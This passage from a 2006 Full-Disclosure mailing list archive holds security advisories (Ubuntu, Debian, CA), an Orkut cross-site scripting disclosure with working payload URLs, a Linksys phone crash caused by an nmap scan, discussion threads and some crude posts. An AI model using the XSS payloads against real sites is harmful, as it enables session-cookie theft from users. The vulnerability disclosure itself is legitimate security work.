f926720946b2df30c66c62f7a66aaba8 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libgdbm-ruby1.8_1.8.4-5ubuntu1.2_powerpc.deb Size/MD5: 173864 04b680e0347869403a09cf9f630c9a55 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libopenssl-ruby1.8_1.8.4-5ubuntu1.2_powerpc.deb Size/MD5: 267234 17a196d0c1b485cd571c42adfc77689d http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libreadline-ruby1.8_1.8.4-5ubuntu1.2_powerpc.deb Size/MD5: 173520 2dd8d2f8ce3c53c39fa820eaa2a9a0e0 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8-dbg_1.8.4-5ubuntu1.2_powerpc.deb Size/MD5: 1069614 2280c70cdf9d1c98f659b4a58ccca045 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8_1.8.4-5ubuntu1.2_powerpc.deb Size/MD5: 1520688 29af64f8ac3edc9a22c3d41df27ad5c7 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libtcltk-ruby1.8_1.8.4-5ubuntu1.2_powerpc.deb Size/MD5: 1800718 4bdef6264f711486ae09988fd8871282 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8-dev_1.8.4-5ubuntu1.2_powerpc.deb Size/MD5: 689070 42cebb7853832c61cc99ee7b4b9c02d8 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8_1.8.4-5ubuntu1.2_powerpc.deb Size/MD5: 193214 12971cfc5aea7409c5c380b53446c547 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libdbm-ruby1.8_1.8.4-5ubuntu1.2_sparc.deb Size/MD5: 170924 6e57c642a819e0dc9b00a71585477865 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libgdbm-ruby1.8_1.8.4-5ubuntu1.2_sparc.deb Size/MD5: 171704 476e1774fadd13553c6d64b21e27fd8c http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libopenssl-ruby1.8_1.8.4-5ubuntu1.2_sparc.deb Size/MD5: 269338 139cd674bce5d4ed9d459741067ca5d4 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libreadline-ruby1.8_1.8.4-5ubuntu1.2_sparc.deb Size/MD5: 171648 3c0e1b84f467a5e2694a274f6fc6a366 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8-dbg_1.8.4-5ubuntu1.2_sparc.deb Size/MD5: 923638 619c17b5ce815a73b947f1bd86226528 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8_1.8.4-5ubuntu1.2_sparc.deb Size/MD5: 1472008 92f5af5dd58bcd09fc78325cadad002c http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libtcltk-ruby1.8_1.8.4-5ubuntu1.2_sparc.deb Size/MD5: 1796578 eb84364062c5628ef87b1751bf3ad238 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8-dev_1.8.4-5ubuntu1.2_sparc.deb Size/MD5: 711580 3a6932c9f94dae9b94cca8fd06643b3b http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8_1.8.4-5ubuntu1.2_sparc.deb Size/MD5: 191302 065b6e5984291cedcedcbb6ab8244f47 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061207/1117fbbc/attachment.bin From rajesh.sethumadhavan at yahoo.com Fri Dec 8 07:26:07 2006 From: rajesh.sethumadhavan at yahoo.com (Rajesh Sethumadhavan) Date: Thu, 7 Dec 2006 23:26:07 -0800 (PST) Subject: [Full-disclosure] Orkut Multiple Cross Site Scripting Vulnerabilities Message-ID: <893889.65198.qm@web37212.mail.mud.yahoo.com> Orkut Multiple Cross Site Scripting Vulnerabilities ##################################################################### XDisclose Advisory : XD100092 Vulnerability Discovered: November 18th 2006 Advisory Released : December 08th 2006 Credit : Rajesh Sethumadhavan Class : Cross Site Scripting HTML Injection Severity : Medium Solution Status : Unpatched Vendor : Google Inc Vendor Website : http://www.orkut.com Affected applications : Orkut Services Affected Platform : All ##################################################################### Overview: Orkut is an Internet social network service run by Google and named after its creator, Orkut B?y?kk?kten. It claims to be designed to help users meet new friends and maintain existing relationships with pictures and messages, and establish new ones by reaching out to people you've never met before. Orkut service is vulnerable to Cross-Site Scripting and HTML Injection. This is caused due to improper validation of user-supplied inputs. Description: A remote attacker can craft a GET request with the XSS payload as demonstrated below. When the victim clicks on the GET request the payload will get executed which result in stealing of cookie, IP info, refer info, browser information, clipboard content, operating system info, hardware Info, modification of page or html injection, url redirection, port scanning of the network, and even phishing is possible. 1)Orkut Invite XSS: The flaws are due to improper sanitization of inputs passed to 'continue' parameter in GET request ------------------------------------------------------------------- http://www.orkut.com/Invite.aspx?continue=javascript:alert(document.cookie) ------------------------------------------------------------------ Demonstration: Note: Demonstration leads to your personal information disclosure - Login to your orkut account - Paste the above URL - Click on BACK button - Orkut Cookies will get displayed The similar way HTML injection is also possible. Vulnerable Code: ------------------------------------------------------------------ ------------------------------------------------------------------ 2)Orkut Next page XSS: The flaws are due to improper sanitization of inputs passed to 'nid' parameter in GET request. This vulnerability is already fixed 2 days before Get Request with XSS payload: ------------------------------------------------------------------ http://www.orkut.com/Scrapbook.aspx?uid=3595989687719502785&pageSize =&na=3&nst=-2&nid=13550271097807907792-%22};%20alert('Xdisclose');% 20function%20tt(){// ------------------------------------------------------------------ Vulnerable Code: ------------------------------------------------------------------ function changePageSize(value) { window.location="/Scrapbook.aspx?uid=3595989687719502785&na= 1&nst=1&nid=13550271097807907792-"}; alert('Xdisclose'); function tt(){//&pageSize="+value; } ------------------------------------------------------------------ Solution: Orkut can improve their filters by disallowing certain characters like " <>/\?&`~!@#$%^*()[]|;:"' " in user input URL. Screenshot: http://www.xdisclose.com/Images/xdorkutinvitexss.jpg Impact: Successful exploitation allows execution of arbitrary script code in a user?s browser session in context of an affected site which result in stealing of cookie, IP info, refer info, browser information, clipboard content, operating system info, Referer info, hardware Info, modification of page or html injection (temporary webpage defacement), modification of page title, hijacking page flow, url redirection, port scanning of the victim?s network, and even phishing is possible. Impact of the vulnerability is network level. Original Advisory: http://www.xdisclose.com/XD100092.txt Credits: Rajesh Sethumadhavan has been credited with the discovery of this vulnerability Disclaimer: This entire document is strictly for educational, testing and demonstrating purpose only. Modification use and/or publishing this information is entirely on your own risk. The exploit code is to be used on your own orkut account. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory. --------------------------------- Everyone is raving about the all-new Yahoo! Mail beta. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061207/c2935d38/attachment.html From shawnmer at gmail.com Fri Dec 8 06:53:07 2006 From: shawnmer at gmail.com (Shawn Merdinger) Date: Thu, 7 Dec 2006 22:53:07 -0800 Subject: [Full-disclosure] Linksys WIP 330 VoIP wireless phone crash fromNmap scan In-Reply-To: References: Message-ID: Hi, Yes, this is an extraordinarily lame bug, but that's sort of the point with many of these VoIP phones, both wired and wireless. They are a new class of device going onto networks and tend to be kind of sucky when it comes to what I'd consider *expected customer environment tool runs* like Nmap and Nessus, not to mention plenty of others such as ISIC, Protos, Asteroid, ...and that's just sticking with the free stuff. I didn't find the bug anyways, I just reported it to Linksys and then FD. And even though I'm poking around with a bunch of VoIP phones on my own time and dime, I don't own one of these WIP 330s. Anyway, you seem happy with your WIP 330...once you got it configured... http://www.trixbox.org/modules/newbb/viewtopic.php?topic_id=5974&forum=3#forumpost23445 Say, if you have the cycles for some free vendor QA, and since you have a WIP 330 in hand, maybe you can find something much cooler with that PhoneCtl.exe crash and get back to us? Thanks, --scm On 12/7/06, pingywon wrote: > > "The crash > > appears related to PhoneCtl.exe running on the phone's Windows CE 4.2 > > operating system." > > "Let me take a look at that screenshot again..." > > http://www.flickr.com/photos/metalmijn/295348294/ > > "Heck buddy, you appear correct" > > ~p > > > > > > ----- Original Message ----- > From: "Shawn Merdinger" > To: > Sent: Wednesday, December 06, 2006 1:40 PM > Subject: [Full-disclosure] Linksys WIP 330 VoIP wireless phone crash > fromNmap scan > > > > Vulnerability Description > > ================== > > The Linksys WIP 330 VoIP wireless phone will crash when a full > > port-range Nmap scan is run against its IP address. > > > > > > Linksys WIP 330 Firmware Version > > ========================== > > 1.00.06A > > > > > > Nmap scan command > > ================ > > nmap -P0 -p 1-65535 > > > > > > Impact > > ===== > > The crash is only after Nmap has finished. The Nmap scan also seems to > > disrupt updating of the display as the clock is not updated. The crash > > appears related to PhoneCtl.exe running on the phone's Windows CE 4.2 > > operating system. > > > > Screenshot of the crash: http://www.flickr.com/photos/metalmijn/295348294/ > > > > > > Credit > > ==== > > Credit for discovering this vulnerability goes to Armijn Hemel > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > From radules at telekom.yu Fri Dec 8 13:31:52 2006 From: radules at telekom.yu (solenoid (lists)) Date: Fri, 08 Dec 2006 14:31:52 +0100 Subject: [Full-disclosure] What was the name of the web site ... Message-ID: <45796948.8070604@telekom.yu> ... that keeps track of MS vulnerabilities, patches and the corresponding exploits? I know that it was mentioned earlier in this list but can not remember the URL right now... TIA From lwang at lwang.org Fri Dec 8 13:50:40 2006 From: lwang at lwang.org (Louis Wang) Date: Fri, 8 Dec 2006 21:50:40 +0800 Subject: [Full-disclosure] Google pageranked 4 doamin on sale... Message-ID: <21ae1b060612080550x24e0ed4fg4dc2340e7b02b67e@mail.gmail.com> hi, there: I don't konw whether it is the right place to post this message, but the web site is security related in my original thought. I'd like to sell my web site http://www.lwang.org. It has google pageranked 4, and full control of domain. The web server is in Czech, it has 500M space and 5G traffic per month. Anyone interested in it, please contact me. Thanks. From pingywon at hotmail.com Fri Dec 8 15:10:16 2006 From: pingywon at hotmail.com (pingywon) Date: Fri, 8 Dec 2006 10:10:16 -0500 Subject: [Full-disclosure] Linksys WIP 330 VoIP wireless phone crash fromNmap scan References: Message-ID: They are truly a "fragile" class of new devices. I bought the over priced WIP330 for testing myself. And minus the rather good screen brightness and resolution in pretty disappointed with it (its just a cumbersome phone). but as long as Cisco is still selling their gray scale wifi phone for $500 I consider it a deal. ----- Original Message ----- From: "Shawn Merdinger" To: "pingywon" ; Sent: Friday, December 08, 2006 1:53 AM Subject: Re: [Full-disclosure] Linksys WIP 330 VoIP wireless phone crash fromNmap scan > Hi, > > Yes, this is an extraordinarily lame bug, but that's sort of the point > with many of these VoIP phones, both wired and wireless. They are a > new class of device going onto networks and tend to be kind of sucky > when it comes to what I'd consider *expected customer environment tool > runs* like Nmap and Nessus, not to mention plenty of others such as > ISIC, Protos, Asteroid, ...and that's > just sticking with the free stuff. > > I didn't find the bug anyways, I just reported it to Linksys and then > FD. And even though I'm poking around with a bunch of VoIP phones on > my own time and dime, I don't own one of these WIP 330s. > > Anyway, you seem happy with your WIP 330...once you got it configured... > http://www.trixbox.org/modules/newbb/viewtopic.php?topic_id=5974&forum=3#forumpost23445 > > Say, if you have the cycles for some free vendor QA, and since you > have a WIP 330 in hand, maybe you can find something much cooler with > that PhoneCtl.exe crash and get back to us? > > Thanks, > --scm > > > > > On 12/7/06, pingywon wrote: >> >> "The crash >> > appears related to PhoneCtl.exe running on the phone's Windows CE 4.2 >> > operating system." >> >> "Let me take a look at that screenshot again..." >> >> http://www.flickr.com/photos/metalmijn/295348294/ >> >> "Heck buddy, you appear correct" >> >> ~p >> >> >> >> >> >> ----- Original Message ----- >> From: "Shawn Merdinger" >> To: >> Sent: Wednesday, December 06, 2006 1:40 PM >> Subject: [Full-disclosure] Linksys WIP 330 VoIP wireless phone crash >> fromNmap scan >> >> >> > Vulnerability Description >> > ================== >> > The Linksys WIP 330 VoIP wireless phone will crash when a full >> > port-range Nmap scan is run against its IP address. >> > >> > >> > Linksys WIP 330 Firmware Version >> > ========================== >> > 1.00.06A >> > >> > >> > Nmap scan command >> > ================ >> > nmap -P0 -p 1-65535 >> > >> > >> > Impact >> > ===== >> > The crash is only after Nmap has finished. The Nmap scan also seems to >> > disrupt updating of the display as the clock is not updated. The crash >> > appears related to PhoneCtl.exe running on the phone's Windows CE 4.2 >> > operating system. >> > >> > Screenshot of the crash: >> > http://www.flickr.com/photos/metalmijn/295348294/ >> > >> > >> > Credit >> > ==== >> > Credit for discovering this vulnerability goes to Armijn Hemel >> > >> > _______________________________________________ >> > Full-Disclosure - We believe in it. >> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> > Hosted and sponsored by Secunia - http://secunia.com/ >> > >> >> > From skx at debian.org Fri Dec 8 15:30:27 2006 From: skx at debian.org (Steve Kemp) Date: Fri, 8 Dec 2006 15:30:27 +0000 Subject: [Full-disclosure] [SECURITY] [DSA-1230-1] new l2tpns packages fix buffer overflow Message-ID: <20061208153027.GA24274@steve.org.uk> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1230-1 security at debian.org http://www.debian.org/security/ Steve Kemp December 08, 2006 - ------------------------------------------------------------------------ Package : l2tpns (2.0.14-1sarge1) Vulnerability : buffer overflow Problem type : remote Debian-specific: no CVE Id(s) : CVE-2006-5873 Debian Bug : 401742 Rhys Kidd discovered a vulnerability in l2tpns, a layer 2 tunnelling protocol network server, which could be triggered by a remote user to execute arbitary code. For the stable distribution (sarge), this problem has been fixed in version 2.0.14-1sarge1. For the unstable distribution (sid) this problem has been fixed in version 2.1.21-1 We recommend that you upgrade your l2tpns package. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian 3.1 (stable) - ------------------- Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/l/l2tpns/l2tpns_2.0.14.orig.tar.gz Size/MD5 checksum: 149672 462bca675b5e27f40f5e5f92918911cb http://security.debian.org/pool/updates/main/l/l2tpns/l2tpns_2.0.14-1sarge1.diff.gz Size/MD5 checksum: 2760 21dd07043e996a6deb282ad9318ff523 http://security.debian.org/pool/updates/main/l/l2tpns/l2tpns_2.0.14-1sarge1.dsc Size/MD5 checksum: 585 16faad913601881770b688f2fc8e8357 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/l/l2tpns/l2tpns_2.0.14-1sarge1_alpha.deb Size/MD5 checksum: 195906 4d8481e9bf411cd71b3439fba8c65f4d amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/l/l2tpns/l2tpns_2.0.14-1sarge1_amd64.deb Size/MD5 checksum: 152440 164d2205b4cd8fc99bc4763fb7ac9b38 arm architecture (ARM) http://security.debian.org/pool/updates/main/l/l2tpns/l2tpns_2.0.14-1sarge1_arm.deb Size/MD5 checksum: 151706 317794e1cbd89bf03a5276a5e0e6e946 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/l/l2tpns/l2tpns_2.0.14-1sarge1_hppa.deb Size/MD5 checksum: 169062 80e4b651500315e6cfeae09cbd990cca i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/l/l2tpns/l2tpns_2.0.14-1sarge1_i386.deb Size/MD5 checksum: 144584 4a447fcc5dae3781f84f21bc8a262937 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/l/l2tpns/l2tpns_2.0.14-1sarge1_ia64.deb Size/MD5 checksum: 227898 e14fc8e036271566d4a9178e10650ad3 m68k architecture (Motorola Mc680x0) http://security.debian.org/pool/updates/main/l/l2tpns/l2tpns_2.0.14-1sarge1_m68k.deb Size/MD5 checksum: 128076 e30c757e00a9914890caeab4da5e364d mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/l/l2tpns/l2tpns_2.0.14-1sarge1_mips.deb Size/MD5 checksum: 165256 c5eadfb746ff587e557241fcea756011 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/l/l2tpns/l2tpns_2.0.14-1sarge1_mipsel.deb Size/MD5 checksum: 168406 b11641d83e799878de35512edb09dbfa powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/l/l2tpns/l2tpns_2.0.14-1sarge1_powerpc.deb Size/MD5 checksum: 168706 9b4038dbfaa5fe14ac7df25857cc0e7f s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/l/l2tpns/l2tpns_2.0.14-1sarge1_s390.deb Size/MD5 checksum: 155020 d4a196ecf8b13ae8d0830e45571cc29d sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/l/l2tpns/l2tpns_2.0.14-1sarge1_sparc.deb Size/MD5 checksum: 160188 ab36083d96a6d5ca028d93032eccdec0 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.1 (GNU/Linux) iD8DBQFFeYTewM/Gs81MDZ0RAiNuAJ4o30KstSFj0X5GrshuYyqA9ZQD+ACg0Sra sYfycLstw+C/fh2GUnJDBdM= =zQOG -----END PGP SIGNATURE----- From dudevanwinkle at gmail.com Fri Dec 8 16:37:43 2006 From: dudevanwinkle at gmail.com (Dude VanWinkle) Date: Fri, 8 Dec 2006 11:37:43 -0500 Subject: [Full-disclosure] Google pageranked 4 doamin on sale... In-Reply-To: <21ae1b060612080550x24e0ed4fg4dc2340e7b02b67e@mail.gmail.com> References: <21ae1b060612080550x24e0ed4fg4dc2340e7b02b67e@mail.gmail.com> Message-ID: On 12/8/06, Louis Wang wrote: > I'd like to sell my web site http://www.lwang.org. It has google > pageranked 4, and full control of domain. The web server is in Czech, > it has 500M space and 5G traffic per month. is it pageranked #4 for the word "wang"? what is the czech work for Willie the One Eyed Wonder Weasel?? anyways, if you are going to try and sell a site based on its rank, and assuming you arent talking about smell, you might want to include the category. Even though you said its a security related site; the content isnt always a guarantee of the category it is associated with, see: disney pr0n googlebombing, etc, etc. We could look it up, but not only are FD'ers notoriously lazy, as you are the "salesman" you might want to try and attract lazy marks,.. err buyers. -JP Bonus wang link with a hat-tip to Larry Seltzer for providing it, maybe NSFW depending on where you W: http://www.starma.com/penis/penis.html From researchonhackers at yahoo.com Fri Dec 8 16:32:35 2006 From: researchonhackers at yahoo.com (Thomas Holt) Date: Fri, 8 Dec 2006 08:32:35 -0800 (PST) Subject: [Full-disclosure] Call For Participants For A Research Study Of Hacker Culture Message-ID: <20061208163235.15537.qmail@web58915.mail.re1.yahoo.com> Greetings, My name is Tom Holt, and I am an Assistant Professor at the University of North Carolina at Charlotte. I am currently conducting a study of hackers and hacking and am seeking interested men and women who may be willing to participate. The purpose of this research is to understand the ways that people become interested in computers and hacking, their motives for hacking, and how they apply their skills in different settings. This study will also consider individuals? conceptions of hacking and experiences in hacker culture. To understand this phenomenon, I am seeking individuals who are willing to share their experiences and opinions in an interview which can be conducted either in person or via encrypted e-mail. Strict confidentiality will be maintained and your privacy ensured. I have obtained a Certificate of Confidentiality from the National Institutes of Health to further protect and ensure your privacy and confidentiality. All individuals who complete an interview will be paid $10 for their time, and $10 will also be paid for successful referrals. If you know anyone who is, or considers his/herself to be a hacker and is willing to be interviewed, please contact me via email at tjholt at uncc.edu, at researchonhackers at yahoo.com, or by phone at 704-795-9544. Again, strict confidentiality will be maintained and your privacy ensured. I am not a law enforcement agent nor connected with any law enforcement agency and am not looking to hear crazy stories about how you hacked NASA. If you have, great, but I realize there is more to hacking than simple media conceptions of the hacker as a criminal. Instead, I am interested in understanding hacking from the hackers? point of view. I have presented my research and described this project at several cons, including CarolinaCon 06, PhreakNIC X, and Defcons 13/14 and am hoping to hear from more individuals in the community. Please contact me if you are interested, and I look forward to hearing from you. Thank you, Thomas J. Holt, Ph. D. ____________________________________________________________________________________ Yahoo! Music Unlimited Access over 1 million songs. http://music.yahoo.com/unlimited -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061208/6fd63309/attachment.html From jan.monsch at iplosion.com Fri Dec 8 17:05:29 2006 From: jan.monsch at iplosion.com (Jan P. Monsch) Date: Fri, 8 Dec 2006 18:05:29 +0100 Subject: [Full-disclosure] Enforcing Java Security Manager in Restricted Windows Environments? Message-ID: <00bc01c71aeb$1393ab70$8210a8c0@moon1> Hi Lately I came across several Citrix and Terminal Server projects which provide a restricted set of applications to their users. This is achieved using Windows Software Restriction Policies or AppSense Application Manager to white or black list executables. One of these permitted binaries is often java.exe. Now the problem arises that once Java is enabled any Java application can be executed on the system. This allows a malicious user to execute arbitrary Java code, like replacement shells (JSH), RDP clients (Propero Java RDP) and network port scanners. I could block java.exe but business requires that the company's Java application must still work. This lead me into this research on how to white list Java applications in a restricted Windows environment. For gory details see: http://www.iplosion.com/archives/54 So all this melts down to my question: Is there a way to tell java.exe to always use the Java Security Manager without the possibility of manipulation by the user? I would be very interested to learn your ideas. Kind regards Jan P. Monsch From Simon.Richter at hogyros.de Fri Dec 8 17:39:29 2006 From: Simon.Richter at hogyros.de (Simon Richter) Date: Fri, 08 Dec 2006 18:39:29 +0100 Subject: [Full-disclosure] Call For Participants For A Research Study Of Hacker Culture In-Reply-To: <20061208163235.15537.qmail@web58915.mail.re1.yahoo.com> References: <20061208163235.15537.qmail@web58915.mail.re1.yahoo.com> Message-ID: <4579A351.1050409@hogyros.de> Hello, Thomas Holt wrote: > The purpose of this research is to understand > the ways that people become interested in computers and hacking, their > motives for hacking, and how they apply their skills in different > settings. This study will also consider individuals? conceptions of > hacking and experiences in hacker culture. [...] > I am not a law enforcement agent nor connected with any law enforcement > agency and am not looking to hear crazy stories about how you hacked > NASA. If you have, great, but I realize there is more to hacking than > simple media conceptions of the hacker as a criminal. Instead, I am > interested in understanding hacking from the hackers? point of view. It is not clear how you understand the term "hacker". In your opening paragraph, it basically describes someone who is interested in "how things work" (which is close to the definition given in The New Hacker's Dictionary), in the closing it appears to describe people engaged in illegal activity (whom TNHD calls "crackers"). So the question is, are you researching the motivation for gaining knowledge about technology, or are you researching the motivation for illegal activity in a technology setting (which is not really related to knowledge gathering, as can be seen by the vast numbers of "script kiddies" out there)? If this is about the former, I might have a few pointers for you. Simon From James.Williams at ca.com Fri Dec 8 17:57:52 2006 From: James.Williams at ca.com (Williams, James K) Date: Fri, 8 Dec 2006 12:57:52 -0500 Subject: [Full-disclosure] [CAID 34846]: CA BrightStor ARCserve Backup Discovery Service Buffer Overflow Vulnerability Message-ID: <649CDCB56C88AA458EFF2CBF494B620401D65A00@USILMS12.ca.com> Title: CAID 34846: CA BrightStor ARCserve Backup Discovery Service Buffer Overflow Vulnerability CA Vulnerability ID (CAID): 34846 CA Advisory Date: 2006-12-07 Discovered By: Assurent Secure Technologies (assurent.com) Impact: Remote attacker can execute arbitrary code. Summary: CA BrightStor ARCserve Backup contains a buffer overflow that allows remote attackers to execute arbitrary code with local SYSTEM privileges on Windows. This issue affects the BrightStor Backup Discovery Service in multiple BrightStor ARCserve Backup application agents and the Base product. Mitigating Factors: None. Severity: CA has given this vulnerability a High risk rating. Affected Products: BrightStor Products: - BrightStor ARCserve Backup r11.5 SP1 and below (SP2 does not have this vulnerability ; please apply r11.5 SP2) - BrightStor ARCserve Backup r11.1 - BrightStor ARCserve Backup for Windows r11 - BrightStor Enterprise Backup 10.5 - BrightStor ARCserve Backup v9.01 CA Protection Suites r2: - CA Server Protection Suite r2 - CA Business Protection Suite r2 - CA Business Protection Suite for Microsoft Small Business Server Standard Edition r2 - CA Business Protection Suite for Microsoft Small Business Server Premium Edition r2 Affected platforms: Microsoft Windows Status and Recommendation: Customers with vulnerable versions of BrightStor ARCserve Backup products should upgrade to the latest versions which are available for download from http://supportconnect.ca.com. Solution Document Reference APARs: QO84609, QI82917, QO84611, QO84610 Determining if you are affected: For a list of updated files, and instructions on how to verify that the security update was fully applied, please review the Informational Solution referenced in the appropriate Solution Document. References (URLs may wrap): CA SupportConnect: http://supportconnect.ca.com/ CA SupportConnect Security Notice for this vulnerability: Important Security Notice for BrightStor ARCserve Backup http://supportconnectw.ca.com/public/storage/infodocs/babsecurity-notice.asp Solution Document Reference APARs: QO84609, QI82917, QO84611, QO84610 CA Security Advisor Research Blog postings: http://www3.ca.com/blogs/posting.aspx?id=90744&pid=96149&date=2006/12 CAID: 34846 CAID Advisory links: http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=34846 Discoverer: Assurent Secure Technologies http://www.assurent.com/ CVE Reference: CVE-2006-6379 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6379 OSVDB Reference: OSVDB IDs: 30775 http://osvdb.org/30775 Changelog for this advisory: v1.0 - Initial Release Customers who require additional information should contact CA Technical Support at http://supportconnect.ca.com. For technical questions or comments related to this advisory, please send email to vuln at ca.com, or contact me directly. If you discover a vulnerability in CA products, please report your findings to vuln at ca.com, or utilize our "Submit a Vulnerability" form. URL: http://www3.ca.com/securityadvisor/vulninfo/submit.aspx Regards, Ken Williams ; 0xE2941985 Director, CA Vulnerability Research CA, One CA Plaza. Islandia, NY 11749 Contact http://www3.ca.com/contact/ Legal Notice http://www3.ca.com/legal/ Privacy Policy http://www3.ca.com/privacy/ Copyright ? 2006 CA. All rights reserved. From researchonhackers at yahoo.com Fri Dec 8 18:55:15 2006 From: researchonhackers at yahoo.com (Thomas Holt) Date: Fri, 8 Dec 2006 10:55:15 -0800 (PST) Subject: [Full-disclosure] Call For Participants For A Research Study Of Hacker Culture Message-ID: <20061208185515.11615.qmail@web58915.mail.re1.yahoo.com> Sorry for any confusion. I am referring to hacker in the context of an individual with a strong interest in technology who uses their skill in unique or innovative ways (in essence, the definition provided by TNHD). How did that knowledge base develop, what furthered your interests, and how do you apply your knowledge? I am not interested in script kiddies, crackers, and lamers who are only out to perform malicious attacks and want to brag about their experiences without actually understanding the mechanics behind what they have done. I hope that clears things up, though if there is still any confusion please let me know. Thanks, Tom ----- Original Message ---- From: Simon Richter To: Thomas Holt Cc: full-disclosure at lists.grok.org.uk Sent: Friday, December 8, 2006 12:39:29 PM Subject: Re: [Full-disclosure] Call For Participants For A Research Study Of Hacker Culture Hello, Thomas Holt wrote: > The purpose of this research is to understand > the ways that people become interested in computers and hacking, their > motives for hacking, and how they apply their skills in different > settings. This study will also consider individuals? conceptions of > hacking and experiences in hacker culture. [...] > I am not a law enforcement agent nor connected with any law enforcement > agency and am not looking to hear crazy stories about how you hacked > NASA. If you have, great, but I realize there is more to hacking than > simple media conceptions of the hacker as a criminal. Instead, I am > interested in understanding hacking from the hackers? point of view. It is not clear how you understand the term "hacker". In your opening paragraph, it basically describes someone who is interested in "how things work" (which is close to the definition given in The New Hacker's Dictionary), in the closing it appears to describe people engaged in illegal activity (whom TNHD calls "crackers"). So the question is, are you researching the motivation for gaining knowledge about technology, or are you researching the motivation for illegal activity in a technology setting (which is not really related to knowledge gathering, as can be seen by the vast numbers of "script kiddies" out there)? If this is about the former, I might have a few pointers for you. Simon ____________________________________________________________________________________ Do you Yahoo!? Everyone is raving about the all-new Yahoo! Mail beta. http://new.mail.yahoo.com -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061208/8dade820/attachment.html From sovietnam_88 at yahoo.com Fri Dec 8 18:54:57 2006 From: sovietnam_88 at yahoo.com (crook) Date: Fri, 8 Dec 2006 10:54:57 -0800 (PST) Subject: [Full-disclosure] This is serious business Message-ID: <590917.68755.qm@web58905.mail.re1.yahoo.com> loldongs --------------------------------- Everyone is raving about the all-new Yahoo! Mail beta. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061208/27f88a14/attachment.html -------------- next part -------------- A non-text attachment was scrubbed... Name: mCrook.jpg Type: image/pjpeg Size: 46940 bytes Desc: 549980111-mCrook.jpg Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061208/27f88a14/attachment.bin From sovietnam_88 at yahoo.com Fri Dec 8 19:08:46 2006 From: sovietnam_88 at yahoo.com (crook) Date: Fri, 8 Dec 2006 11:08:46 -0800 (PST) Subject: [Full-disclosure] MICHAEL CROOK COCK JPEG VULNERABILITY Message-ID: <20061208190846.92849.qmail@web58901.mail.re1.yahoo.com> Michael's crook --------------------------------- Access over 1 million songs - Yahoo! Music Unlimited. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061208/f5f35617/attachment.html -------------- next part -------------- A non-text attachment was scrubbed... Name: mCrook.jpg Type: image/pjpeg Size: 46940 bytes Desc: 549980111-mCrook.jpg Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061208/f5f35617/attachment.bin From noodle.mastah at gmail.com Fri Dec 8 19:16:01 2006 From: noodle.mastah at gmail.com (chinese soup) Date: Fri, 8 Dec 2006 20:16:01 +0100 Subject: [Full-disclosure] Call For Participants For A Research Study Of Hacker Culture In-Reply-To: <20061208163235.15537.qmail@web58915.mail.re1.yahoo.com> References: <20061208163235.15537.qmail@web58915.mail.re1.yahoo.com> Message-ID: Greetings! I come in peace!!! "I am currently 